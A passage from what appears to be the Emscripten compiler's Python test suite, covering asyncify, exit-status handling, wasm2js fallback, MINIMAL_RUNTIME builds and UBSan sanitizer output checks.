# the call ends with the drop, which is the last in the stream, at the
# highest address
end_addr_loc = wat.rfind('drop', 0, call_loc)
assert end_addr_loc > 0
end_addr_loc = wat.rfind('0x', 0, end_addr_loc)
assert end_addr_loc > 0
end_addr_loc_end = wat.find('\n', end_addr_loc)
assert end_addr_loc_end > 0
end_addr = int(wat[end_addr_loc:end_addr_loc_end], 0)
return (start_addr, end_addr)
# match up the DWARF and the wat
for i in range(3):
dwarf_addr = get_dwarf_addr(6 + i, 3)
start_wat_addr, end_wat_addr = get_wat_addr(i)
# the dwarf may match any of the 3 instructions that form the stream of
# of instructions implementing the call in the source code, in theory
self.assertLessEqual(start_wat_addr, dwarf_addr)
self.assertLessEqual(dwarf_addr, end_wat_addr)
def test_modularize_closure_pre(self):
# test that the combination of modularize + closure + pre-js works. in that mode,
# closure should not minify the Module object in a way that the pre-js cannot use it.
create_file('post.js', 'var TheModule = Module();\n')
if not self.is_wasm():
# TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
self.emcc_args += [
'--pre-js', test_file('core/modularize_closure_pre.js'),
'--extern-post-js=post.js',
'--closure=1',
'-g1',
'-s',
'MODULARIZE=1',
]
self.do_core_test('modularize_closure_pre.c')
@no_wasm2js('symbol names look different wasm2js backtraces')
def test_emscripten_log(self):
self.banned_js_engines = [config.V8_ENGINE] # v8 doesn't support console.log
self.set_setting('DEMANGLE_SUPPORT')
if '-g' not in self.emcc_args:
self.emcc_args.append('-g')
self.emcc_args += ['-DRUN_FROM_JS_SHELL']
self.do_run_in_out_file_test('emscripten_log/emscripten_log.cpp', interleaved_output=False)
# test closure compiler as well
if self.maybe_closure():
self.emcc_args += ['-g1'] # extra testing
self.do_run_in_out_file_test('emscripten_log/emscripten_log_with_closure.cpp', interleaved_output=False)
def test_float_literals(self):
self.do_run_in_out_file_test('test_float_literals.cpp')
def test_exit_status(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
create_file('exit.c', r'''
#include <stdio.h>
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
static void cleanup() {
#ifndef NORMAL_EXIT
assert(0 && "cleanup should only be called from normal exit()");
#endif
printf("cleanup\n");
}
int main() {
atexit(cleanup); // this atexit should still be called
printf("hello, world!\n");
// Unusual exit status to make sure it's working!
#ifdef CAPITAL_EXIT
_Exit(118);
#elif defined(UNDER_EXIT)
_exit(118);
#elif defined(NORMAL_EXIT)
exit(118);
#endif
}
''')
create_file('pre.js', '''
Module.onExit = function() {
out('I see exit status: ' + EXITSTATUS);
}
''')
self.emcc_args += ['--pre-js', 'pre.js']
print('.. exit')
self.do_runf('exit.c', 'hello, world!\ncleanup\nI see exit status: 118', assert_returncode=118, emcc_args=['-DNORMAL_EXIT'])
print('.. _exit')
self.do_runf('exit.c', 'hello, world!\nI see exit status: 118', assert_returncode=118, emcc_args=['-DUNDER_EXIT'])
print('.. _Exit')
self.do_runf('exit.c', 'hello, world!\nI see exit status: 118', assert_returncode=118, emcc_args=['-DCAPITAL_EXIT'])
def test_noexitruntime(self):
src = r'''
#include <emscripten.h>
#include <stdio.h>
static int testPre = TEST_PRE;
struct Global {
Global() {
printf("in Global()\n");
if (testPre) { EM_ASM(noExitRuntime = true;); }
}
~Global() { printf("ERROR: in ~Global()\n"); }
} global;
int main() {
if (!testPre) { EM_ASM(noExitRuntime = true;); }
printf("in main()\n");
}
'''
self.do_run(src.replace('TEST_PRE', '0'), 'in Global()\nin main()')
self.do_run(src.replace('TEST_PRE', '1'), 'in Global()\nin main()')
def test_minmax(self):
self.do_runf(test_file('test_minmax.c'), 'NAN != NAN\nSuccess!')
def test_localeconv(self):
self.do_run_in_out_file_test('core/test_localeconv.c')
def test_newlocale(self):
self.do_run_in_out_file_test('core/test_newlocale.c')
def test_setlocale(self):
self.do_run_in_out_file_test('core/test_setlocale.c')
def test_vswprintf_utf8(self):
self.do_run_in_out_file_test('vswprintf_utf8.c')
# needs setTimeout which only node has
@require_node
@no_memory64('TODO: asyncify for wasm64')
def test_async_hello(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.set_setting('ASYNCIFY')
create_file('main.c', r'''
#include <stdio.h>
#include <emscripten.h>
void f(void *p) {
*(int*)p = 99;
printf("!");
}
int main() {
int i = 0;
printf("Hello");
emscripten_async_call(f, &i, 1);
printf("World");
emscripten_sleep(100);
printf("%d\n", i);
}
''')
self.do_runf('main.c', 'HelloWorld!99')
@require_node
@no_memory64('TODO: asyncify for wasm64')
def test_async_ccall_bad(self):
# check bad ccall use
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.set_setting('ASYNCIFY')
self.set_setting('ASSERTIONS')
self.set_setting('INVOKE_RUN', 0)
create_file('main.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
printf("Hello");
emscripten_sleep(100);
printf("World\n");
}
''')
create_file('pre.js', '''
Module['onRuntimeInitialized'] = function() {
try {
ccall('main', 'number', ['number', 'string'], [2, 'waka']);
var never = true;
} catch(e) {
out(e);
assert(!never);
}
};
''')
self.emcc_args += ['--pre-js', 'pre.js']
self.do_runf('main.c', 'The call to main is running asynchronously.')
@require_node
@no_memory64('TODO: asyncify for wasm64')
def test_async_ccall_good(self):
# check reasonable ccall use
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.set_setting('ASYNCIFY')
self.set_setting('ASSERTIONS')
self.set_setting('INVOKE_RUN', 0)
create_file('main.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
printf("Hello");
emscripten_sleep(100);
printf("World\n");
}
''')
create_file('pre.js', '''
Module['onRuntimeInitialized'] = function() {
ccall('main', null, ['number', 'string'], [2, 'waka'], { async: true });
};
''')
self.emcc_args += ['--pre-js', 'pre.js']
self.do_runf('main.c', 'HelloWorld')
@parameterized({
'': (False,),
'exit_runtime': (True,),
})
@no_memory64('TODO: asyncify for wasm64')
def test_async_ccall_promise(self, exit_runtime):
self.set_setting('ASYNCIFY')
self.set_setting('EXIT_RUNTIME')
self.set_setting('ASSERTIONS')
self.set_setting('INVOKE_RUN', 0)
self.set_setting('EXIT_RUNTIME', exit_runtime)
self.set_setting('EXPORTED_FUNCTIONS', ['_stringf', '_floatf'])
create_file('main.c', r'''
#include <stdio.h>
#include <emscripten.h>
const char* stringf(char* param) {
emscripten_sleep(20);
printf("stringf: %s", param);
return "second";
}
double floatf() {
emscripten_sleep(20);
emscripten_sleep(20);
return 6.4;
}
''')
create_file('pre.js', r'''
Module['onRuntimeInitialized'] = function() {
runtimeKeepalivePush();
ccall('stringf', 'string', ['string'], ['first\n'], { async: true })
.then(function(val) {
console.log(val);
ccall('floatf', 'number', null, null, { async: true }).then(function(arg) {
console.log(arg);
runtimeKeepalivePop();
maybeExit();
});
});
};
''')
self.emcc_args += ['--pre-js', 'pre.js']
self.do_runf('main.c', 'stringf: first\nsecond\n6.4')
@no_memory64('TODO: asyncify for wasm64')
def test_fibers_asyncify(self):
self.set_setting('ASYNCIFY')
self.maybe_closure()
self.do_runf(test_file('test_fibers.cpp'), '*leaf-0-100-1-101-1-102-2-103-3-104-5-105-8-106-13-107-21-108-34-109-*')
def test_asyncify_unused(self):
# test a program not using asyncify, but the pref is set
self.set_setting('ASYNCIFY')
self.do_core_test('test_hello_world.c')
@parameterized({
'normal': ([], True),
'removelist_a': (['-sASYNCIFY_REMOVE=["foo(int, double)"]'], False),
'removelist_b': (['-sASYNCIFY_REMOVE=["bar()"]'], True),
'removelist_c': (['-sASYNCIFY_REMOVE=["baz()"]'], False),
'onlylist_a': (['-sASYNCIFY_ONLY=["main","__original_main","foo(int, double)","baz()","c_baz","Structy::funcy()","bar()"]'], True),
'onlylist_b': (['-sASYNCIFY_ONLY=["main","__original_main","foo(int, double)","baz()","c_baz","Structy::funcy()"]'], True),
'onlylist_c': (['-sASYNCIFY_ONLY=["main","__original_main","foo(int, double)","baz()","c_baz"]'], False),
'onlylist_d': (['-sASYNCIFY_ONLY=["foo(int, double)","baz()","c_baz","Structy::funcy()"]'], False),
'onlylist_b_response': ([], True, '["main","__original_main","foo(int, double)","baz()","c_baz","Structy::funcy()"]'),
'onlylist_c_response': ([], False, '["main","__original_main","foo(int, double)","baz()","c_baz"]'),
})
@no_memory64('TODO: asyncify for wasm64')
def test_asyncify_lists(self, args, should_pass, response=None):
if response is not None:
create_file('response.file', response)
self.set_setting('ASYNCIFY_ONLY', '@response.file')
self.set_setting('ASYNCIFY')
self.emcc_args += args
if should_pass:
self.do_core_test('test_asyncify_lists.cpp', assert_identical=True)
else:
self.do_runf(test_file('core/test_asyncify_lists.cpp'), ('RuntimeError', 'Thrown at'), assert_returncode=NON_ZERO)
# use of ASYNCIFY_* options may require intermediate debug info. that should
# not end up emitted in the final binary
if self.is_wasm():
filename = 'test_asyncify_lists.wasm'
# there should be no name section. sanitizers, however, always enable that
if not is_sanitizing(self.emcc_args):
self.assertFalse(webassembly.Module(filename).has_name_section())
# in a fully-optimized build, imports and exports are minified too and we
# can verify that our function names appear nowhere
if '-O3' in self.emcc_args:
binary = read_binary(filename)
self.assertFalse(b'main' in binary)
@parameterized({
'normal': ([], True),
'ignoreindirect': (['-sASYNCIFY_IGNORE_INDIRECT'], False),
'add': (['-sASYNCIFY_IGNORE_INDIRECT', '-sASYNCIFY_ADD=["__original_main","main","virt()"]'], True),
})
@no_memory64('TODO: asyncify for wasm64')
def test_asyncify_indirect_lists(self, args, should_pass):
self.set_setting('ASYNCIFY')
self.emcc_args += args
try:
self.do_core_test('test_asyncify_indirect_lists.cpp', assert_identical=True)
if not should_pass:
should_pass = True
raise Exception('should not have passed')
except Exception:
if should_pass:
raise
@no_asan('asyncify stack operations confuse asan')
@no_memory64('TODO: asyncify for wasm64')
def test_emscripten_scan_registers(self):
self.set_setting('ASYNCIFY')
self.do_core_test('test_emscripten_scan_registers.cpp')
@no_memory64('TODO: asyncify for wasm64')
def test_asyncify_assertions(self):
self.set_setting('ASYNCIFY')
self.set_setting('ASYNCIFY_IMPORTS', ['suspend'])
self.set_setting('ASSERTIONS')
self.do_core_test('test_asyncify_assertions.c', assert_returncode=NON_ZERO)
@no_lsan('leaks asyncify stack during exit')
@no_asan('leaks asyncify stack during exit')
@no_memory64('TODO: asyncify for wasm64')
def test_asyncify_during_exit(self):
self.set_setting('ASYNCIFY')
self.set_setting('ASSERTIONS')
self.set_setting('EXIT_RUNTIME', 1)
self.do_core_test('test_asyncify_during_exit.cpp', assert_returncode=NON_ZERO)
print('NO_ASYNC')
self.do_core_test('test_asyncify_during_exit.cpp', emcc_args=['-DNO_ASYNC'], out_suffix='_no_async')
@no_asan('asyncify stack operations confuse asan')
@no_lsan('undefined symbol __global_base')
@no_wasm2js('dynamic linking support in wasm2js')
def test_asyncify_main_module(self):
self.set_setting('ASYNCIFY', 1)
self.set_setting('MAIN_MODULE', 2)
self.do_core_test('test_hello_world.c')
@no_asan('asyncify stack operations confuse asan')
@no_memory64('TODO: asyncify for wasm64')
@no_wasm2js('TODO: lazy loading in wasm2js')
@parameterized({
'conditional': (True,),
'unconditional': (False,),
})
def test_emscripten_lazy_load_code(self, conditional):
self.set_setting('ASYNCIFY_LAZY_LOAD_CODE')
self.set_setting('ASYNCIFY_IGNORE_INDIRECT')
self.set_setting('MALLOC', 'emmalloc')
self.emcc_args += ['--profiling-funcs'] # so that we can find the functions for the changes below
if conditional:
self.emcc_args += ['-DCONDITIONAL']
self.do_core_test('emscripten_lazy_load_code.cpp', args=['0'])
first_size = os.path.getsize('emscripten_lazy_load_code.wasm')
second_size = os.path.getsize('emscripten_lazy_load_code.wasm.lazy.wasm')
print('first wasm size', first_size)
print('second wasm size', second_size)
if not conditional and self.is_optimizing() and '-g' not in self.emcc_args and '-fsanitize=leak' not in self.emcc_args:
# If the call to lazy-load is unconditional, then the optimizer can dce
# out more than half
self.assertLess(first_size, 0.6 * second_size)
wasm1 = read_binary('emscripten_lazy_load_code.wasm')
wasm2 = read_binary('emscripten_lazy_load_code.wasm.lazy.wasm')
self.assertNotEqual(wasm1, wasm2)
# attempts to "break" the wasm by adding an unreachable in $foo_end. returns whether we found it.
def break_wasm(name):
wat = self.run_process([Path(building.get_binaryen_bin(), 'wasm-dis'), name], stdout=PIPE).stdout
lines = wat.splitlines()
wat = None
for i in range(len(lines)):
if '(func $foo_end ' in lines[i]:
j = i + 1
while '(local ' in lines[j]:
j += 1
# we found the first line after the local defs
lines[j] = '(unreachable)' + lines[j]
wat = '\n'.join(lines)
break
if wat is None:
# $foo_end is not present in the wasm, nothing to break
shutil.copyfile(name, name + '.orig')
return False
with open('wat.wat', 'w') as f:
f.write(wat)
shutil.move(name, name + '.orig')
self.run_process([Path(building.get_binaryen_bin(), 'wasm-as'), 'wat.wat', '-o', name, '-g'])
return True
def verify_working(args=['0']):
self.assertContained('foo_end\n', self.run_js('emscripten_lazy_load_code.js', args=args))
def verify_broken(args=['0']):
self.assertNotContained('foo_end\n', self.run_js('emscripten_lazy_load_code.js', args=args, assert_returncode=NON_ZERO))
# the first-loaded wasm will not reach the second call, since we call it after lazy-loading.
# verify that by changing the first wasm to throw in that function
found_foo_end = break_wasm('emscripten_lazy_load_code.wasm')
if not conditional and self.is_optimizing():
self.assertFalse(found_foo_end, 'should have optimized out $foo_end')
verify_working()
# but breaking the second wasm actually breaks us
if not break_wasm('emscripten_lazy_load_code.wasm.lazy.wasm'):
raise Exception('could not break lazy wasm - missing expected code')
verify_broken()
# restore
shutil.copyfile('emscripten_lazy_load_code.wasm.orig', 'emscripten_lazy_load_code.wasm')
shutil.copyfile('emscripten_lazy_load_code.wasm.lazy.wasm.orig', 'emscripten_lazy_load_code.wasm.lazy.wasm')
verify_working()
if conditional:
# if we do not call the lazy load function, then we do not need the lazy wasm,
# and we do the second call in the first wasm
os.remove('emscripten_lazy_load_code.wasm.lazy.wasm')
verify_broken()
verify_working(['42'])
break_wasm('emscripten_lazy_load_code.wasm')
verify_broken()
# Test basic wasm2js functionality in all core compilation modes.
@no_asan('no wasm2js support yet in asan')
@no_lsan('no wasm2js support yet in lsan')
def test_wasm2js(self):
if not self.is_wasm():
self.skipTest('redundant to test wasm2js in wasm2js* mode')
self.set_setting('WASM', 0)
self.do_core_test('test_hello_world.c')
# a mem init file is emitted just like with JS
expect_memory_init_file = self.uses_memory_init_file()
if expect_memory_init_file:
self.assertExists('test_hello_world.js.mem')
mem = read_binary('test_hello_world.js.mem')
self.assertTrue(mem[-1] != b'\0')
else:
self.assertNotExists('test_hello_world.js.mem')
@no_asan('no wasm2js support yet in asan')
@no_lsan('no wasm2js support yet in lsan')
def test_maybe_wasm2js(self):
if not self.is_wasm():
self.skipTest('redundant to test wasm2js in wasm2js* mode')
self.set_setting('MAYBE_WASM2JS')
# see that running as wasm works
self.do_core_test('test_hello_world.c')
# run wasm2js, bundle the code, and use the wasm2js path
cmd = [PYTHON, path_from_root('tools/maybe_wasm2js.py'), 'test_hello_world.js', 'test_hello_world.wasm']
if self.is_optimizing():
cmd += ['-O2']
self.run_process(cmd, stdout=open('do_wasm2js.js', 'w')).stdout
# remove the wasm to make sure we never use it again
os.remove('test_hello_world.wasm')
# verify that it runs
self.assertContained('hello, world!', self.run_js('do_wasm2js.js'))
@no_asan('no wasm2js support yet in asan')
@parameterized({
'': ([],),
'minimal_runtime': (['-sMINIMAL_RUNTIME'],),
})
def test_wasm2js_fallback(self, args):
if not self.is_wasm():
self.skipTest('redundant to test wasm2js in wasm2js* mode')
cmd = [EMCC, test_file('small_hello_world.c'), '-sWASM=2'] + args
self.run_process(cmd)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('a.out.wasm.js', 'a.out.wasm.js.unused')
self.assertContained('hello!', self.run_js('a.out.js'))
os.rename('a.out.wasm.js.unused', 'a.out.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
open('b.out.js', 'w').write('WebAssembly = undefined;\n' + read_file('a.out.js'))
os.remove('a.out.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.assertContained('hello!', self.run_js('b.out.js'))
def test_cxx_self_assign(self):
# See https://github.com/emscripten-core/emscripten/pull/2688 and http://llvm.org/bugs/show_bug.cgi?id=18735
self.do_run(r'''
#include <map>
#include <stdio.h>
int main() {
std::map<int, int> m;
m[0] = 1;
m = m;
// size should still be one after self assignment
if (m.size() == 1) {
printf("ok.\n");
}
}
''', 'ok.')
def test_memprof_requirements(self):
# This test checks for the global variables required to run the memory
# profiler. It would fail if these variables were made no longer global
# or if their identifiers were changed.
create_file('main.c', '''
int check_memprof_requirements();
int main() {
return check_memprof_requirements();
}
''')
create_file('lib.js', '''
mergeInto(LibraryManager.library, {
check_memprof_requirements: function() {
if (typeof _emscripten_stack_get_base === 'function' &&
typeof _emscripten_stack_get_end === 'function' &&
typeof _emscripten_stack_get_current === 'function' &&
typeof Module['___heap_base'] === 'number') {
out('able to run memprof');
return 0;
} else {
out('missing the required variables to run memprof');
return 1;
}
}
});
''')
self.emcc_args += ['--memoryprofiler', '--js-library', 'lib.js']
self.do_runf('main.c', 'able to run memprof')
def test_fs_dict(self):
self.set_setting('FORCE_FILESYSTEM')
self.emcc_args += ['-lidbfs.js']
self.emcc_args += ['-lnodefs.js']
create_file('pre.js', '''
Module = {};
Module['preRun'] = function() {
out(typeof FS.filesystems['MEMFS']);
out(typeof FS.filesystems['IDBFS']);
out(typeof FS.filesystems['NODEFS']);
// Globals
console.log(typeof MEMFS);
console.log(typeof IDBFS);
console.log(typeof NODEFS);
};
''')
self.emcc_args += ['--pre-js', 'pre.js']
self.do_run('int main() { return 0; }', 'object\nobject\nobject\nobject\nobject\nobject')
def test_fs_dict_none(self):
# if IDBFS and NODEFS are not enabled, they are not present.
self.set_setting('FORCE_FILESYSTEM')
self.set_setting('ASSERTIONS')
create_file('pre.js', '''
Module = {};
Module['preRun'] = function() {
out(typeof FS.filesystems['MEMFS']);
out(typeof FS.filesystems['IDBFS']);
out(typeof FS.filesystems['NODEFS']);
// Globals
if (ASSERTIONS) {
console.log(typeof MEMFS);
console.log(IDBFS);
console.log(NODEFS);
FS.mkdir('/working1');
try {
FS.mount(IDBFS, {}, '/working1');
} catch (e) {
console.log('|' + e + '|');
}
}
};
''')
self.emcc_args += ['--pre-js', 'pre.js']
expected = '''\
object
undefined
undefined
object
IDBFS is no longer included by default; build with -lidbfs.js
NODEFS is no longer included by default; build with -lnodefs.js
|IDBFS is no longer included by default; build with -lidbfs.js|'''
self.do_run('int main() { return 0; }', expected)
def test_stack_overflow_check(self):
self.set_setting('TOTAL_STACK', 1048576)
self.set_setting('STACK_OVERFLOW_CHECK', 2)
self.do_runf(test_file('stack_overflow.cpp'), 'stack overflow', assert_returncode=NON_ZERO)
self.emcc_args += ['-DONE_BIG_STRING']
self.do_runf(test_file('stack_overflow.cpp'), 'stack overflow', assert_returncode=NON_ZERO)
# ASSERTIONS=2 implies STACK_OVERFLOW_CHECK=2
self.clear_setting('STACK_OVERFLOW_CHECK')
self.set_setting('ASSERTIONS', 2)
self.do_runf(test_file('stack_overflow.cpp'), 'stack overflow', assert_returncode=NON_ZERO)
@node_pthreads
def test_binaryen_2170_emscripten_atomic_cas_u8(self):
self.set_setting('USE_PTHREADS')
self.do_run_in_out_file_test('binaryen_2170_emscripten_atomic_cas_u8.cpp')
@also_with_standalone_wasm()
def test_sbrk(self):
self.do_runf(test_file('sbrk_brk.cpp'), 'OK.')
def test_brk(self):
self.emcc_args += ['-DTEST_BRK=1']
self.do_runf(test_file('sbrk_brk.cpp'), 'OK.')
# Tests that we can use the dlmalloc mallinfo() function to obtain information
# about malloc()ed blocks and compute how much memory is used/freed.
@no_asan('mallinfo is not part of ASan malloc')
@no_lsan('mallinfo is not part of LSan malloc')
def test_mallinfo(self):
self.do_runf(test_file('mallinfo.cpp'), 'OK.')
@no_asan('cannot replace malloc/free with ASan')
@no_lsan('cannot replace malloc/free with LSan')
def test_wrap_malloc(self):
self.do_runf(test_file('wrap_malloc.cpp'), 'OK.')
def test_environment(self):
self.set_setting('ASSERTIONS')
def test(assert_returncode=0):
self.do_core_test('test_hello_world.c', assert_returncode=assert_returncode)
js = read_file('test_hello_world.js')
assert ('require(' in js) == ('node' in self.get_setting('ENVIRONMENT')), 'we should have require() calls only if node js specified'
for engine in config.JS_ENGINES:
print(engine)
# set us to test in just this engine
self.banned_js_engines = [e for e in config.JS_ENGINES if e != engine]
# tell the compiler to build with just that engine
if engine == config.NODE_JS:
right = 'node'
wrong = 'shell'
else:
right = 'shell'
wrong = 'node'
# test with the right env
self.set_setting('ENVIRONMENT', right)
print('ENVIRONMENT =', self.get_setting('ENVIRONMENT'))
test()
# test with the wrong env
self.set_setting('ENVIRONMENT', wrong)
print('ENVIRONMENT =', self.get_setting('ENVIRONMENT'))
try:
test(assert_returncode=NON_ZERO)
raise Exception('unexpected success')
except Exception as e:
self.assertContained('not compiled for this environment', str(e))
# test with a combined env
self.set_setting('ENVIRONMENT', right + ',' + wrong)
print('ENVIRONMENT =', self.get_setting('ENVIRONMENT'))
test()
def test_postrun_exception(self):
# verify that an exception thrown in postRun() will not trigger the
# compilation failed handler, and will be printed to stderr.
# Explictly disable EXIT_RUNTIME, since otherwise addOnPostRun does not work.
# https://github.com/emscripten-core/emscripten/issues/15080
self.set_setting('EXIT_RUNTIME', 0)
self.add_post_run('ThisFunctionDoesNotExist()')
self.build(test_file('core/test_hello_world.c'))
output = self.run_js('test_hello_world.js', assert_returncode=NON_ZERO)
self.assertStartswith(output, 'hello, world!')
self.assertContained('ThisFunctionDoesNotExist is not defined', output)
# Tests that building with -s DECLARE_ASM_MODULE_EXPORTS=0 works
def test_no_declare_asm_module_exports(self):
self.set_setting('DECLARE_ASM_MODULE_EXPORTS', 0)
self.set_setting('WASM_ASYNC_COMPILATION', 0)
self.maybe_closure()
self.do_runf(test_file('declare_asm_module_exports.cpp'), 'jsFunction: 1')
js = read_file('declare_asm_module_exports.js')
occurances = js.count('cFunction')
if self.is_optimizing() and '-g' not in self.emcc_args:
# In optimized builds only the single reference cFunction that exists in the EM_ASM should exist
if self.is_wasm():
self.assertEqual(occurances, 1)
else:
# With js the asm module itself also contains a reference for the cFunction name
self.assertEqual(occurances, 2)
else:
print(occurances)
# Tests that building with -s DECLARE_ASM_MODULE_EXPORTS=0 works
@no_asan('TODO: ASan support in minimal runtime')
def test_minimal_runtime_no_declare_asm_module_exports(self):
self.set_setting('DECLARE_ASM_MODULE_EXPORTS', 0)
self.set_setting('WASM_ASYNC_COMPILATION', 0)
self.maybe_closure()
self.set_setting('MINIMAL_RUNTIME')
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
self.do_runf(test_file('declare_asm_module_exports.cpp'), 'jsFunction: 1')
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
@parameterized({
'default': ([],),
'streaming': (['-sMINIMAL_RUNTIME_STREAMING_WASM_COMPILATION'],),
'streaming_inst': (['-sMINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION'],),
'no_export': (['-sDECLARE_ASM_MODULE_EXPORTS=0'],)
})
def test_minimal_runtime_hello_world(self, args):
# TODO: Support for non-Node.js shells has not yet been added to MINIMAL_RUNTIME
self.banned_js_engines = [config.V8_ENGINE, config.SPIDERMONKEY_ENGINE]
self.emcc_args = args
self.set_setting('MINIMAL_RUNTIME')
self.maybe_closure()
self.do_runf(test_file('small_hello_world.c'), 'hello')
# Test that printf() works in MINIMAL_RUNTIME=1
@parameterized({
'fs': ('FORCE_FILESYSTEM',),
'nofs': ('NO_FILESYSTEM',),
})
@no_asan('TODO: ASan support in minimal runtime')
def test_minimal_runtime_hello_printf(self, extra_setting):
self.set_setting('MINIMAL_RUNTIME')
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
self.set_setting(extra_setting)
# $FS is not fully compatible with MINIMAL_RUNTIME so fails with closure
# compiler. lsan also pulls in $FS
if '-fsanitize=leak' not in self.emcc_args and extra_setting != 'FORCE_FILESYSTEM':
self.maybe_closure()
self.do_runf(test_file('hello_world.c'), 'hello, world!')
# Tests that -s MINIMAL_RUNTIME=1 works well with SAFE_HEAP
@no_asan('TODO: ASan support in minimal runtime')
def test_minimal_runtime_safe_heap(self):
self.set_setting('MINIMAL_RUNTIME')
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
self.set_setting('SAFE_HEAP')
# $FS is not fully compatible with MINIMAL_RUNTIME so fails with closure
# compiler.
# lsan pulls in $FS
if '-fsanitize=leak' not in self.emcc_args:
self.maybe_closure()
self.do_runf(test_file('small_hello_world.c'), 'hello')
# Tests global initializer with -s MINIMAL_RUNTIME=1
@no_asan('TODO: ASan support in minimal runtime')
def test_minimal_runtime_global_initializer(self):
self.set_setting('MINIMAL_RUNTIME')
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
self.maybe_closure()
self.do_runf(test_file('test_global_initializer.cpp'), 't1 > t0: 1')
@no_wasm2js('wasm2js does not support PROXY_TO_PTHREAD (custom section support)')
def test_return_address(self):
self.set_setting('USE_OFFSET_CONVERTER')
self.do_runf(test_file('core/test_return_address.c'), 'passed')
@no_wasm2js('TODO: sanitizers in wasm2js')
@no_asan('-fsanitize-minimal-runtime cannot be used with ASan')
@no_lsan('-fsanitize-minimal-runtime cannot be used with LSan')
def test_ubsan_minimal_too_many_errors(self):
self.emcc_args += ['-fsanitize=undefined', '-fsanitize-minimal-runtime']
if not self.is_wasm():
if self.is_optimizing():
self.skipTest('test can only be run without optimizations on asm.js')
# Need to use `-g` to get proper line numbers in asm.js
self.emcc_args += ['-g']
self.do_runf(test_file('core/test_ubsan_minimal_too_many_errors.c'),
expected_output='ubsan: add-overflow\n' * 20 + 'ubsan: too many errors\n')
@no_wasm2js('TODO: sanitizers in wasm2js')
@no_asan('-fsanitize-minimal-runtime cannot be used with ASan')
@no_lsan('-fsanitize-minimal-runtime cannot be used with LSan')
def test_ubsan_minimal_errors_same_place(self):
self.emcc_args += ['-fsanitize=undefined', '-fsanitize-minimal-runtime']
if not self.is_wasm():
if self.is_optimizing():
self.skipTest('test can only be run without optimizations on asm.js')
# Need to use `-g` to get proper line numbers in asm.js
self.emcc_args += ['-g']
self.do_runf(test_file('core/test_ubsan_minimal_errors_same_place.c'),
expected_output='ubsan: add-overflow\n' * 5)
@parameterized({
'fsanitize_undefined': (['-fsanitize=undefined'],),
'fsanitize_integer': (['-fsanitize=integer'],),
'fsanitize_overflow': (['-fsanitize=signed-integer-overflow'],),
})
@no_wasm2js('TODO: sanitizers in wasm2js')
def test_ubsan_full_overflow(self, args):
self.emcc_args += args
self.do_runf(test_file('core/test_ubsan_full_overflow.c'),
assert_all=True, expected_output=[
".c:3:5: runtime error: signed integer overflow: 2147483647 + 1 cannot be represented in type 'int'",
".c:7:7: runtime error: signed integer overflow: 2147483647 + 1 cannot be represented in type 'int'",
])
@parameterized({
'fsanitize_undefined': (['-fsanitize=undefined'],),
'fsanitize_return': (['-fsanitize=return'],),
})
@no_wasm2js('TODO: sanitizers in wasm2js')
def test_ubsan_full_no_return(self, args):
self.emcc_args += ['-Wno-return-type'] + args
self.do_runf(test_file('core/test_ubsan_full_no_return.cpp'),
expected_output='.cpp:1:5: runtime error: execution reached the end of a value-returning function without returning a value', assert_returncode=NON_ZERO)
@parameterized({
'fsanitize_undefined': (['-fsanitize=undefined'],),
'fsanitize_integer': (['-fsanitize=integer'],),
'fsanitize_shift': (['-fsanitize=shift'],),
})
@no_wasm2js('TODO: sanitizers in wasm2js')
def test_ubsan_full_left_shift(self, args):
self.emcc_args += args
self.do_runf(test_file('core/test_ubsan_full_left_shift.c'),
assert_all=True, expected_output=[
'.c:3:5: runtime error: left shift of negative value -1',
".c:7:5: runtime error: left shift of 16 by 29 places cannot be represented in type 'int'"
])
@parameterized({
'fsanitize_undefined': (['-fsanitize=undefined'],),
'fsanitize_null': (['-fsanitize=null'],),
'dylink': (['-fsanitize=null', '-sMAIN_MODULE=2'],),
})
@no_wasm2js('TODO: sanitizers in wasm2js')
def test_ubsan_full_null_ref(self, args):
if is_sanitizing(self.emcc_args):
self.skipTest('test is specific to null sanitizer')
self.emcc_args += args
self.do_runf(test_file('core/test_ubsan_full_null_ref.cpp'),
assert_all=True, expected_output=[
".cpp:3:12: runtime error: reference binding to null pointer of type 'int'",
".cpp:4:13: runtime error: reference binding to null pointer of type 'int'",
".cpp:5:14: runtime error: reference binding to null pointer of type 'int'",
])
@parameterized({
'fsanitize_undefined': (['-fsanitize=undefined'],),
'fsanitize_vptr': (['-fsanitize=vptr'],),
})
@no_wasm2js('TODO: sanitizers in wasm2js')
def test_ubsan_full_static_cast(self, args):
self.emcc_args += args
self.do_runf(test_file('core/test_ubsan_full_static_cast.cpp'),
assert_all=True, expected_output=[
".cpp:18:10: runtime error: downcast of address",
"which does not point to an object of type 'R'",
])
@parameterized({
'g': ('-g', [
".cpp:3:12: runtime error: reference binding to null pointer of type 'int'",
'in main',
]),
'g4': ('-gsource-map', [
".cpp:3:12: runtime error: reference binding to null pointer of type 'int'",
'in main ',
'.cpp:3:8'
]),
})
@no_wasm2js('TODO: sanitizers in wasm2js')
def test_ubsan_full_stack_trace(self, g_flag, expected_output):
if g_flag == '-gsource-map':
if not self.is_wasm():
self.skipTest('wasm2js has no source map support')
elif self.get_setting('EVAL_CTORS'):
self.skipTest('EVAL_CTORS does not support source maps')
create_file('pre.js', 'Module = {UBSAN_OPTIONS: "print_stacktrace=1"};')
self.emcc_args += ['-fsanitize=null', g_flag, '--pre-js=pre.js']
self.set_setting('ALLOW_MEMORY_GROWTH')
